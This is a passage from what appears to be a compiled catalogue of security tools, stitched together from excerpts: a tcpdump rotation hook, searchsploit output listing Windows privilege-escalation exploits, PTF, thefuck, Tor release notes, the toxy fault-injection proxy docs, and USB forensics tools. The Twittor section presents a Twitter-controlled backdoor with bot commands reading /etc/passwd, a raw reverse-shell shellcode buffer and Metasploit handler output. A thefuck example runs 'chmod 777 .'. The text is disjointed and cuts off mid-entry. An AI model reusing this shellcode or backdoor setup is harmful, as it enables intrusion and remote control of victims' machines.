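        fh.write(b"not a capture")
    gz = postrotate(cap)
    with gzip.open(gz, "rb") as fh:
        restored = fh.read()
    with open(gz + ".sha256") as fh:
        recorded = fh.read().split()[0]
    return {
        "gz": gz,
        "original_removed": not os.path.exists(cap),
        "roundtrip_ok": restored == header,
        "hash_ok": recorded == sha256_of(gz),
        "junk_rejected": postrotate(junk) is None and os.path.exists(junk),
    }


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: hook.py <savefile>")
    sys.exit(0 if postrotate(sys.argv[1]) else 1)
```

Verify an archived file later with `sha256sum -c trace.pcap00.gz.sha256` from the archive directory, and read it back without unpacking to disk with `zcat trace.pcap00.gz | tcpdump -nr -`. Keeping the magic-number check in the hook matters because -z hands the hook whatever path tcpdump closed; a hook that blindly compresses and deletes its argument is one misconfiguration away from eating a file it should not touch.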
expression
selects which packets will be dumped. If no expression is given,
all packets on the net will be dumped. Otherwise, only packets
for which expression is `true' will be dumped. For the
expression syntax, see pcap-filter(7).
The expression argument can be passed to tcpdump as either
a single Shell argument, or as multiple Shell arguments,
whichever is more convenient. Generally, if the expression
contains Shell metacharacters, such as backslashes used to
escape protocol names, it is easier to pass it as a single,
quoted argument rather than to escape the Shell
metacharacters. Multiple arguments are concatenated with
spaces before being parsed.
EXAMPLES
To print all packets arriving at or departing from sundown:
tcpdump host sundown
To print traffic between helios and either hot or ace:
Download Tcpdump
TEEMIP - IP ADDRESS MANAGEMENT SOLUTION
DownloadTeemIp
TESTDISK - PARTITION RECOVERY AND FILE UNDELETE
FOR WINDOWS, LINUX AND MAC
TestDisk can find lost partitions for all of these file systems:
BeFS ( BeOS )
BSD disklabel ( FreeBSD/OpenBSD/NetBSD )
CramFS, Compressed File System
DOS/Windows FAT12, FAT16 and FAT32
XBox FATX
Windows exFAT
HFS, HFS+ and HFSX, Hierarchical File System
JFS, IBM's Journaled File System
Linux btrfs
DownloadTestDisk
THE EXPLOIT-DATABASE GIT REPOSITORY
Usage
By default, searches will try to be greedy.
-v - Verbose output: lines are allowed to overflow their columns
-h, --help - Show help screen
NOTES:
- Use any number of search terms you would like (minimum: 1)
- Search terms are not case sensitive, and order is irrelevant
root@kali:~# searchsploit afd windows local
---------------------------------------------------------------|---------------------------------
 Description                                                   | Path
---------------------------------------------------------------|---------------------------------
                                                               | /windows/dos/17133.c
 Windows XP/2003 Afd.sys - Local Privilege Escalation Exploit (M| /windows/local/18176.py
 Windows - AfdJoinLeaf Privilege Escalation (MS11-080)         | /windows/local/21844.rb
---------------------------------------------------------------|---------------------------------
root@kali:~#
Supported software
Windows
  tortoise
  wifi
    Wireless Network Password (Windows mechanism)
  windows credentials
    Domain visible network (.Net Passport)
    Generic network credentials
Linux
  browsers
    firefox
    opera
  chats
    pidgin
    jitsi
  mails
    thunderbird
  adminsys
    filezilla
    environment variables
  database
    sqldeveloper
    squirrel
    dbvisualizer
  wifi
    network manager
  wallet
    gnome keyring
IE Browser history
For Linux: None
First check out the config/ptf.config file, which contains the base
location where everything will be installed. By default this is the
/pentest directory. Once that is configured, run PTF by typing
./ptf (or python ptf).
This puts you in a Metasploit-like shell with a similar look and
feel for consistency. show modules, use, etc. are all accepted
commands. First things first: always type help or ? to see a full
list of commands.
Update EVERYTHING!
If you want to install and/or update everything, simply do the
following:
./ptf
use modules/install_update_all
run
This will install all of the tools inside of PTF. If they are already
installed, this will iterate through and update everything for you
automatically.
You can also show options to change information about the
modules.
Modules:
First, head over to the modules/ directory, inside of there are
sub directories based on the Penetration Testing Execution
Standard (PTES) phases. Go into those phases and look at the
different modules. As soon as you add a new one, for example
testing.py, it will automatically be imported next time you launch
PTF. There are a few key components when looking at a
module that must be completed.
Below is a sample module
Module Development:
All of the fields are straightforward. For repository locations, right
now all that's supported is GIT. The plan for the next release is
to expand to a file downloader; this can still be accomplished
through after commands (explained later). Fill in the depends,
and where you want the install location to be. PTF will take the
directory where the python file is located (for example exploitation)
and append it to what you specify in the PTF config (located under
config). By default it installs all your tools under /pentest/.
Note that in modules you can use {INSTALL_LOCATION} in after
commands. It is replaced with the install location when the after
commands run.
After Commands:
After commands are commands that you can insert after an
installation. This could be switching to a directory and kicking
off additional commands to finish the installation. For example
in the BEEF scenario, you need to run ruby install-beef
afterwards. Below is an example of after commands using the
{INSTALL_LOCATION} flag.
AFTER_COMMANDS="cp config/dict/rockyou.txt {INSTALL_LOCATION}"
For AFTER_COMMANDS that do self install (don't need user
interaction) - place an exit after your commands so it exits the
shell.
Few examples:
apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open
(13: Permission denied)
E: Unable to lock the administration directory (/var/lib/
dpkg/), are you root?
fuck
sudo apt-get install vim [enter///ctrl+c]
[sudo] password for nvbn:
Reading package lists... Done
...
git push
fatal: The current branch master has no upstream branch.
To push the current branch and set the remote as
upstream, use
git push --set-upstream origin master
fuck
git push --set-upstream origin master [enter///ctrl+c]
Counting objects: 9, done.
...
puthon
No command 'puthon' found, did you mean:
Command 'python' from package 'python-minimal' (main)
Command 'python' from package 'python3' (main)
zsh: command not found: puthon
fuck
python [enter///ctrl+c]
Python 3.4.2 (default, Oct 8 2014, 13:08:17)
...
git brnch
git: 'brnch' is not a git command. See 'git --help'.
Did you mean this?
branch
fuck
git branch [enter///ctrl+c]
* master
lein rpl
'rpl' is not a task. See 'lein help'.
Did you mean this?
repl
fuck
lein repl [enter///ctrl+c]
nREPL server started on port 54848 on host 127.0.0.1 nrepl://127.0.0.1:54848
REPL-y 0.3.1
...
Requirements
Installation [ experimental ]
Manual installation
Install The Fuck with pip:
sudo pip install thefuck
name;
directory;
cpp11 adds missing -std=c++11 to g++ or clang++ ;
dirty_untar fixes tar x command that untarred in the
current directory;
dirty_unzip fixes unzip command that unzipped in
the current directory;
django_south_ghost adds --delete-ghost-migrations to a django
south migration that failed because of ghost migrations;
django_south_merge adds --merge to inconsistent
django south migration;
docker_not_command fixes wrong docker commands
like docker tags ;
dry fixes repetitions like git git push ;
fix_alt_space replaces Alt+Space with Space
character;
fix_file opens a file with an error in your $EDITOR ;
git_add fixes "Did you forget to 'git add'?" ;
git_branch_delete changes git branch -d to git
branch -D ;
git_branch_list catches git branch list in place of
git branch and removes created branch;
git_checkout fixes branch name or creates new
branch;
git_diff_staged adds --staged to previous git diff
with unexpected output;
git_fix_stash fixes git stash commands
(misspelled subcommand and missing save );
git_not_command fixes wrong git commands like git
brnch ;
git_pull sets upstream before executing previous git
pull ;
git_pull_clone clones instead of pulling when the
For adding your own rule you should create your-rule-name.py in ~/.thefuck/rules. The rule should contain two
functions:
match(command: Command) -> bool
get_new_command(command: Command) -> str | list[str]
A complete rule (the match function is supplied here so the snippet is whole; it assumes the Command object exposes the failed command's stderr):
import subprocess

def match(command):
    # Fire only when the previous command failed with a permission error
    return 'Permission denied' in command.stderr

def get_new_command(command):
    # Re-run the same command line under sudo
    return 'sudo {}'.format(command.script)

# Optional:
enabled_by_default = True

def side_effect(command, fixed_command):
    # Runs after the fixed command; this chmod only demonstrates the hook
    # and is not something a rule should do in practice
    subprocess.call('chmod 777 .', shell=True)

priority = 1000  # lower runs first; 1000 is the default
requires_output = True  # the rule needs the command's output to match
Developing
Install The Fuck for development:
pip install -r requirements.txt
python setup.py develop
Download Thefuck
TIGER - THE UNIX SECURITY AUDIT AND INTRUSION
DETECTION TOOL
Download Tiger
TOR BROWSER 4.5 - EVERYTHING YOU NEED TO SAFELY
BROWSE THE INTERNET
Security Improvements
The 4.5 series also features a rewrite of the obfs2, obfs3, and
ScrambleSuit transports in GoLang, as well as the introduction
of the new obfs4 transport. The obfs4 transport provides
additional DPI and probing resistance features which prevent
automated scanning for Tor bridges. As long as they are not
discovered via other mechanisms, fresh obfs4 bridge
addresses will work in China today. Additionally, barring new
attacks, private obfs4 addresses should continue to work
indefinitely.
Privacy Improvements
Here is the complete list of changes in the 4.5 series since 4.0:
All Platforms
Update Tor to 0.2.6.7 with additional patches:
Bug 15482: Reset timestamp_dirty each time a
SOCKSAuth circuit is used
Update NoScript to 2.6.9.22
Update HTTPS-Everywhere to 5.0.3
Bug 15689: Resume building HTTPSEverywhere from git tags
Update meek to 0.17
Include obfs4proxy 0.0.5
Use obfs4proxy for obfs2, obfs3, obfs4, and
ScrambleSuit bridges
Pluggable Transport Dependency Updates:
Bug 15265: Switch go.net repo to golang.org/x/
net
Bug 15448: Use golang 1.4.2 for meek and obfs4proxy
Update Tor Launcher to 0.2.7.4. Changes since 0.2.7.0.2 in 4.0.8:
Bug 11879: Stop bootstrap if Cancel or Open Settings is clicked
Bug 13271: Display Bridge Configuration wizard pane before Proxy pane
Bug 13576: Don't strip "bridge" from the middle of bridge lines
Bug 13983: Directory search path fix for Tor Messenger+TorBirdy
Bug 14122: Hide logo if TOR_HIDE_BROWSER_LOGO set
Bug 14336: Fix navigation button display issues on some wizard panes
Bug 15657: Display the host:port of any connection failures in bootstrap
Bug 15704: Do not enable network if wizard is
opened
Update Torbutton to 1.9.2.2. Changes since 1.7.0.2
in 4.0.8:
Bug 3455: Use SOCKS user+pass to isolate all
requests from the same url domain
Bug 5698: Use "Tor Browser" branding in
"About Tor Browser" dialog
Bug 7255: Warn users about maximizing
windows
Bug 8400: Prompt for restart if disk records are
enabled/disabled.
Bug 8641: Create browser UI to indicate current
tab's Tor circuit IPs
(Many Circuit UI issues were fixed during
4.5; see release changelogs for those).
plugin initialization.
Bug 11175: Remove "About Torbutton" from
onion menu.
Bug 11236: Don't set omnibox order in
Torbutton (to prevent translation)
Bug 11449: Fix new identity error if NoScript is
not enabled
Bug 13019: Change locale spoofing pref to
boolean
Bug 13079: Option to skip control port
verification
Bug 13406: Stop directing users to downloadeasy.html.en on update
Bug 13650: Clip initial window height to 1000px
Bugs 13751+13900: Remove SafeCache cache
isolation code in favor of C++ patch
Bug 13766: Set a 10 minute circuit lifespan for
non-content requests
Bug 13835: Option to change default Tor
Browser homepage
Bug 13998: Handle changes in NoScript
2.6.9.8+
Bug 14100: Option to hide NetworkSettings
menuitem
Bug 14392: Don't steal input focus in about:tor
search box
Bug 14429: Provide automatic window resizing,
but disable for now
Bug 14448: Restore Torbutton menu operation
on non-English localizations
Bug 14490: Use Disconnect search in about:tor
search box
Bug 14630: Hide Torbutton's proxy settings tab.
Bug 14631: Improve profile access error msgs
(strings for translation).
Bugs 14632+15334: Display Cookie Protections
All Platforms
Update Tor to 0.2.6.7 with additional patches:
Bug 15482: Reset timestamp_dirty each time a
SOCKSAuth circuit is used
Update NoScript to 2.6.9.22
Update HTTPS-Everywhere to 5.0.3
Bug 15689: Resume building HTTPSEverywhere from git tags
Update meek to 0.17
Update obfs4proxy to 0.0.5
Update Tor Launcher to 0.2.7.4
Bug 15704: Do not enable network if wizard is
opened
Bug 11879: Stop bootstrap if Cancel or Open
Settings is clicked
Bug 13576: Don't strip "bridge" from the middle
of bridge lines
WHAT IT ISN'T...
Tor Messenger builds on the networks you are familiar with, so
that you can continue communicating in a way your contacts
are willing and able to do. This has traditionally been a client-server
model, meaning that your metadata (specifically the
relationships between contacts) can be logged by the server.
However, your route to the server will be hidden because you
are communicating over Tor.
We are also excited about systems like Pond and Ricochet,
which try to solve this problem, and would encourage you to
look at their designs and use them too.
WHY INSTANTBIRD?
We considered a number of messaging clients: Pidgin, Adam
Langley's xmpp-client, and Instantbird. Instantbird was the
pragmatic choice -- its transport protocols are written in a
memory-safe language (JavaScript); it has a graphical user
interface and already supports many natural languages; and it's
a XUL application, which means we can leverage both the code
(Tor Launcher) and in-house expertise that the Tor Project has
developed working on Tor Browser with Firefox. It also has an
active and vibrant software developer community that has been
very responsive and understanding of our needs. The main
feature it lacked was OTR support, which we have
implemented and hope to upstream to the main Instantbird
repository for the benefit of all Instantbird (and Thunderbird)
users.
INSTRUCTIONS
DownloadTor Messenger:
Linux (32-bit)
Linux (64-bit)
Windows
OS X (Mac)
scopes)
Easily augmentable via middleware (based on connect/
express middleware)
Supports both incoming and outgoing traffic poisoning
Built-in poisons (bandwidth, error, abort, latency, slow
read...)
Rule-based poisoning (probabilistic, HTTP method,
headers, body...)
Supports third-party poisons and rules
Built-in balancer and traffic interceptor via middleware
Inherits API and features from rocky
Compatible with connect/express (and most of their
middleware)
Able to run as standalone HTTP proxy
Introduction
Why toxy?
There are other solutions similar to toxy on the market, but most
of them do not provide proper programmatic control, are usually
not easy to hack or configure, or are simply closed to extensibility.
Furthermore, the majority of those solutions only operate at the
TCP level instead of providing high-level abstractions that cover
the common requirements of the HTTP (L7) protocol, which is what
toxy tries to provide.
toxy brings a powerful, hackable and extensible solution with a
convenient abstraction, without losing low-level access to HTTP
protocol primitives.
toxy was designed based on the rules of composition, simplicity
and extensibility. Via its built-in hierarchical domain specific
middleware layer you can easily augment toxy features to your
own needs.
Concepts
toxy introduces two directives: poisons and rules.
Poisons are the specific logic which infects an incoming or
outgoing HTTP transaction (e.g: injecting a latency, replying
with an error). One HTTP transaction can be poisoned by one
or multiple poisons, and those poisons can be also configured
to infect both global or route level traffic.
Rules are match filters that inspect an HTTP request/response in
order to determine, given certain conditions, whether the HTTP
transaction should be poisoned or not (e.g. if headers match,
query params, method, body...). Rules can be reused and applied
to both incoming and outgoing traffic flows, in different scopes:
global, route or poison level.
How it works
  ( Incoming request )
          |||
    +-------------+
    | Toxy Router |
    +-------------+
          |||
    +--------------------+
    |   Incoming phase   |
    |  ----------------  |
    |  |  Exec Rules  |  |
    |  ----------------  |
    |        |||         |
    |  ----------------  |
    |  | Exec Poisons |  |
    |  ----------------  |
    +~~~~~~~~~~~~~~~~~~~~+
          |||
    +--------------------+
    |  HTTP dispatcher   |
    +--------------------+
          |||
    (  target server  )
          |||
    +--------------------+
    |   Outgoing phase   |
    |  ----------------  |
    |  |  Exec Rules  |  |
    |  ----------------  |
    |        |||         |
    |  ----------------  |
    |  | Exec Poisons |  |
    |  ----------------  |
    +~~~~~~~~~~~~~~~~~~~~+
          |||
Usage
Installation
Examples
See examples directory for more use cases.
var toxy = require('toxy')
var poisons = toxy.poisons
var rules = toxy.rules

// Create a new toxy proxy
var proxy = toxy()

// Default server to forward incoming traffic
proxy
  .forward('http://httpbin.org')

// Register global poisons and rules
proxy
  .poison(poisons.latency({ jitter: 500 }))
  .rule(rules.probability(25))

// Register multiple routes
proxy
  .get('/download/*')
  .forward('http://files.myserver.net')
  .poison(poisons.bandwidth({ bps: 1024 }))
  .withRule(rules.headers({'Authorization': /^Bearer (.*)$/i }))

// Infect outgoing traffic only (after the server replied properly)
proxy
  .get('/image/*')
  .outgoingPoison(poisons.bandwidth({ bps: 512 }))
  .withRule(rules.method('GET'))
  .withRule(rules.timeThreshold({ duration: 1000, threshold: 1000 * 10 }))
  .withRule(rules.responseStatus({ range: [ 200, 400 ] }))

proxy
  .all('/api/*')
  .poison(poisons.rateLimit({ limit: 10, threshold: 1000 }))
  .withRule(rules.method(['POST', 'PUT', 'DELETE']))
  // And use a different, more permissive poison for GET requests
  .poison(poisons.rateLimit({ limit: 50, threshold: 1000 }))
  .withRule(rules.method('GET'))

// Handle the rest of the traffic
proxy
  .all('/*')
  .poison(poisons.slowClose({ delay: 1000 }))
  .poison(poisons.slowRead({ bps: 128 }))
  .withRule(rules.probability(50))

proxy.listen(3000)
console.log('Server listening on port:', 3000)
console.log('Test it:', 'http://localhost:3000/image/jpeg')
Poisons
latency
Poisoning Phase
incoming / outgoing
true
Inject response
Name
inject
Poisoning Phase
incoming / outgoing
toxy.poison(toxy.poisons.inject({
code: 503,
body: '{"error": "toxy injected error"}',
headers: {'Content-Type': 'application/json'}
}))
Bandwidth
Name
bandwidth
Poisoning Phase
incoming / outgoing
true
Rate limit
Name
rateLimit
Poisoning Phase
incoming / outgoing
true
Slow read
Name
slowRead
Poisoning Phase
incoming
true
Slow open
Name
slowOpen
Poisoning Phase
incoming
true
Slow close
Name
slowClose
Poisoning Phase
incoming / outgoing
true
Throttle
Name
throttle
Poisoning Phase
incoming / outgoing
true
Abort connection
Name
abort
Poisoning Phase
incoming / outgoing
Timeout
Name
timeout
Poisoning Phase
incoming / outgoing
true
Arguments:
milliseconds number - Timeout limit in milliseconds
toxy.poison(toxy.poisons.timeout(5000))
You can optionally extend the built-in poisons with your own
poisons:
toxy.addPoison(customLatency)
// Then you can use it as a built-in poison
proxy
.get('/foo')
.poison(toxy.poisons.customLatency)
Name
probability
Poison Phase
incoming / outgoing
Time threshold
Name
timeThreshold
Poison Phase
incoming / outgoing
Method
Name
method
Poison Phase
incoming / outgoing
Content Type
Filters by content type header. It should be present
Arguments :
value string|regexp - Header value to match.
var rule = toxy.rules.contentType('application/json')
toxy.rule(rule)
Headers
Name
headers
Poison Phase
incoming / outgoing
}
var rule = toxy.rules.headers(matchHeaders)
toxy.rule(rule)
Response headers
Name
responseHeaders
Poison Phase
outgoing
Body
Name
body
Poison Phase
incoming / outgoing
Response body
Name
responseBody
Poison Phase
outgoing
Response status
Name
responseStatus
Poison Phase
outgoing
Third-party rules
List of available third-party rules provided by the community.
PRs are welcome.
IP - Enable/disable poisons based on the client IP address
(supports CIDR, subnets, ranges...).
How to write rules
Rules are simple middleware functions that resolve
asynchronously with a boolean value to determine whether a given
HTTP transaction should be ignored when poisoning.
Your rule must resolve by calling next(err, shouldIgnore) in the
middleware, passing true if the rule did not match and the poison
should not be applied; toxy then continues with the next
middleware in the stack.
Here's an example of a simple rule matching the HTTP method
to determine whether the transaction should be poisoned:
var toxy = require('toxy')
function customMethodRule(matchMethod) {
/**
* We name the function since it's used by toxy to
identify the rule to get/disable/remove it in the future
*/
return function customMethodRule(req, res, next) {
var shouldIgnore = req.method !== matchMethod
next(null, shouldIgnore)
}
}
You can optionally extend the built-in rules with your own rules:
toxy.addRule(customMethodRule)
// Then you can use it as a built-in rule
proxy
  .get('/foo')
  .rule(toxy.rules.customMethodRule('GET'))
  .poison(toxy.poisons.latency(1000))
  .withRule(toxy.rules.contentType('json'))
  .forward('http://foo.server')
proxy
  .post('/bar')
  .poison(toxy.poisons.bandwidth({ bps: 1024 }))
  .withRule(toxy.rules.probability(50))
  .forward('http://bar.server')
proxy
  .post('/boo')
  .outgoingPoison(toxy.poisons.bandwidth({ bps: 1024 }))
  .withRule(toxy.rules.method('GET'))
  .forward('http://boo.server')
proxy.all('/*')
proxy.listen(3000)
toxy#get(path, [ middleware... ])
Return: ToxyRoute
Register a new route for GET method.
toxy#post(path, [ middleware... ])
Return: ToxyRoute
Register a new route for POST method.
toxy#put(path, [ middleware... ])
Return: ToxyRoute
Register a new route for PUT method.
toxy#patch(path, [ middleware... ])
Return: ToxyRoute
Register a new route for PATCH method.
toxy#delete(path, [ middleware... ])
Return: ToxyRoute
Register a new route for DELETE method.
toxy#head(path, [ middleware... ])
Return: ToxyRoute
Register a new route for HEAD method.
toxy#all(path, [ middleware... ])
Return: ToxyRoute
Register a new route for any method.
toxy#poisons => Object
Exposes a map with the built-in poisons. Prototype alias to
toxy.poisons
toxy#forward(url)
Define a URL to forward the incoming traffic received by the
proxy.
toxy#balance(urls)
Forward to multiple servers balancing among them.
For more information, see the rocky docs
toxy#replay(url)
Define a new replay server. You can call this method multiple
times to define multiple replay servers.
For more information, see the rocky docs
toxy#use(middleware)
toxy#getPoison(name)
Return: Directive|null
Searches and retrieves a registered poison in the stack by name
identifier.
toxy#getIncomingPoison(name)
Return: Directive|null
Searches and retrieves a registered incoming poison in the
stack by name identifier.
toxy#getOutgoingPoison(name)
Return: Directive|null
Searches and retrieves a registered outgoing poison in the
stack by name identifier.
toxy#getPoisons()
Return: array<Directive>
Return an array of registered poisons.
toxy#getIncomingPoisons()
Return: array<Directive>
Return an array of registered incoming poisons.
toxy#getOutgoingPoisons()
Return: array<Directive>
Return an array of registered outgoing poisons.
toxy#flush()
Alias: flushPoisons
Remove all the registered poisons.
toxy#enableRule(rule)
Enable a rule by name identifier.
toxy#disableRule(rule)
Disable a rule by name identifier.
toxy#removeRule(rule)
Return: boolean
Remove a rule by name identifier.
toxy#disableRules()
Disable all the registered rules.
toxy#isRuleEnabled(rule)
Return: boolean
Checks if the given rule is enabled by name identifier.
toxy#getRule(rule)
Return: Directive|null
Searches and retrieves a registered rule in the stack by name
identifier.
toxy#getRules()
Return: array<Directive>
Returns an array with the registered rules wrapped as
Directive.
toxy#flushRules()
Remove all the rules.
toxy.addPoison(name, fn)
Extend built-in poisons.
toxy.addRule(name, fn)
Extend built-in rules.
toxy.poisons => Object
Exposes a map with the built-in poisons.
toxy.rules => Object
Exposes a map with the built-in rules.
Directive(middlewareFn)
A convenient wrapper internally used for poisons and rules.
Normally you don't need to know this interface, but for hacking
purposes or more low-level actions might be useful.
Directive#enable()
Return: boolean
Directive#disable()
Return: boolean
Directive#isEnabled()
Return: boolean
Directive#rule(rule)
Alias: filter
Directive#handler()
Return: function(req, res, next)
HTTP API
The toxy HTTP API follows the JSON API conventions,
API
Hierarchy :
Servers - Managed toxy instances
Rules - Globally applied rules
Poisons - Globally applied poisons
Rules - Poison-specific rules
Routes - List of configured routes
Route - Object for each specific route
Rules - Route-level registered rules
Poisons - Route-level registered poisons
Rules - Route-level poison-specific
rules
GET /
Servers
GET /servers
GET /servers/:id
Rules
GET /servers/:id/rules
POST /servers/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/rules
GET /servers/:id/rules/:id
DELETE /servers/:id/rules/:id
Poisons
GET /servers/:id/poisons
POST /servers/:id/poisons
Accepts: application/json
Example payload:
{
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }
}
DELETE /servers/:id/poisons
GET /servers/:id/poisons/:id
DELETE /servers/:id/poisons/:id
GET /servers/:id/poisons/:id/rules
POST /servers/:id/poisons/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/poisons/:id/rules
GET /servers/:id/poisons/:id/rules/:id
DELETE /servers/:id/poisons/:id/rules/:id
Routes
GET /servers/:id/routes
POST /servers/:id/routes
Accepts: application/json
Example payload:
{
  "path": "/foo",                // Required
  "method": "GET",               // use ALL for all the methods
  "forward": "http://my.server"  // Optional custom forward server URL
}
DELETE /servers/:id/routes
GET /servers/:id/routes/:id
DELETE /servers/:id/routes/:id
Route rules
GET /servers/:id/routes/:id/rules
POST /servers/:id/routes/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/routes/:id/rules
GET /servers/:id/routes/:id/rules/:id
DELETE /servers/:id/routes/:id/rules/:id
Route poisons
GET /servers/:id/routes/:id/poisons
POST /servers/:id/routes/:id/poisons
Accepts: application/json
Example payload:
{
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }
}
DELETE /servers/:id/routes/:id/poisons
GET /servers/:id/routes/:id/poisons/:id
DELETE /servers/:id/routes/:id/poisons/:id
GET /servers/:id/routes/:id/poisons/:id/rules
POST /servers/:id/routes/:id/poisons/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/routes/:id/poisons/:id/rules
GET /servers/:id/routes/:id/poisons/:id/rules/:id
DELETE /servers/:id/routes/:id/poisons/:id/rules/:id
Programmatic API
The built-in HTTP admin server also provides a simple interface
open to extensibility and hacking purposes. For instance, you
can plug in additional middleware to the admin server, or
register new routes.
toxy.admin([ opts ])
Returns: Admin
Supported options :
apiKey string - Optional API key to protect the server
port number - Optional. TCP port to listen
cors boolean - Enable CORS for web browser access
middleware array<function> - Plug in additional
middleware
ssl object - Node.js HTTPS server TLS options .
Admin#listen([ port, host ])
Start listening on the network.
Admin#manage(toxy)
Manage a toxy server instance.
Admin#find(toxy)
Find a toxy instance. Accepts toxy server ID or toxy instance.
Admin#remove(toxy)
Stop managing a toxy instance.
Admin#use(...middleware)
Register a middleware.
Admin#param(...middleware)
Register a param middleware.
Admin#get(path, [ ...middleware ])
Register a GET route.
Admin#post(path, [ ...middleware ])
Register a POST route.
Admin#put(path, [ ...middleware ])
Register a PUT route.
Admin#delete(path, [ ...middleware ])
Register a DELETE route.
Admin#patch(path, [ ...middleware ])
Register a PATCH route.
Admin#all(path, [ ...middleware ])
Register a route accepting any HTTP method.
Admin#middleware(req, res, next)
Middleware to plug in with connect/express.
Admin#close(cb)
Stop the server.
Download Toxy
TRIBLER - DOWNLOAD TORRENTS USING TOR-INSPIRED
ONION ROUTING
DownloadTribler
TWITTOR - A FULLY FEATURED BACKDOOR THAT USES
TWITTER AS A C&C SERVER
ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET =
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
command:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$
This will send a PING request and wait 10 seconds for them to
answer. Direct messages will then be parsed - Bot list will be
refreshed but also the command list, including new command
outputs.
Retrieve previous commands
As mentioned earlier, previous commands are retrieved from
older direct messages (the limit is 200), and you can see them
by using the list_commands command:
$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$
(...)
Payload size: 299 bytes
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
Et voilà!
msf exploit(handler) > exploit
[*] Started reverse handler on 10.0.0.1:3615
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
Download Twittor
USBDEVIEW V2.45 - VIEW ALL INSTALLED/CONNECTED
USB DEVICES ON YOUR SYSTEM
Download USBDeview v2.45
USBKILL - ANTI-FORENSIC KILL-SWITCH THAT WAITS
FOR A CHANGE ON YOUR USB PORTS
Why?
(version 1.0-rc.2)
Compatible with Linux, *BSD and OS X.
Shuts down the computer when there is USB activity.
Customizable. Define which commands should be
executed just before shut down.
Ability to whitelist a USB device.
Ability to change the check interval (default: 250ms).
Ability to melt the program on shut down.
Works with sleep mode (OS X).
No dependency except srm (sudo apt-get install secure-delete).
Sensible defaults
Download USBkill
USBTRACKER - SCRIPT TO TRACK USB DEVICES
EVENTS AND ARTIFACTS IN A WINDOWS OS
Usage
Help
-u, --usbstor              Dump USB artifacts from USBSTOR registry.
-uu, --usbstor-verbose     Dump USB detailed artifacts from USBSTOR registry.
-nh, --no-hardwareid       ... USBSTOR detailed artifacts registry dump.
-df, --driver-frameworks   Dump USB artifacts and events from the Windows DriverFrameworks Usermode log.
-x, --raw-xml-event
Other&Ven_WD&Prod_SES_Device&Rev_1012
u'GenDisk']
CompatibleIDs : [u'USBSTOR\\Disk', u'USBSTOR\\RAW']
ContainerID : {a3ce89cb-5363-54a8-8d4f-af2374c200a5}
ConfigFlags : 0
ClassGUID : {4d36e967-e325-11ce-bfc1-08002be10318}
Driver : {4d36e967-e325-11ce-bfc1-08002be10318}\0004
Class : DiskDrive
Mfg : @disk.inf,%genmanufacturer%;(Standard disk drives)
Service : disk
FriendlyName : Generic STORAGE DEVICE USB Device
======================================================================
...
To dump the same events in XML format, just add the "-x" flag:
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df -x
USBTracker alpha
2015 - Sysinsider
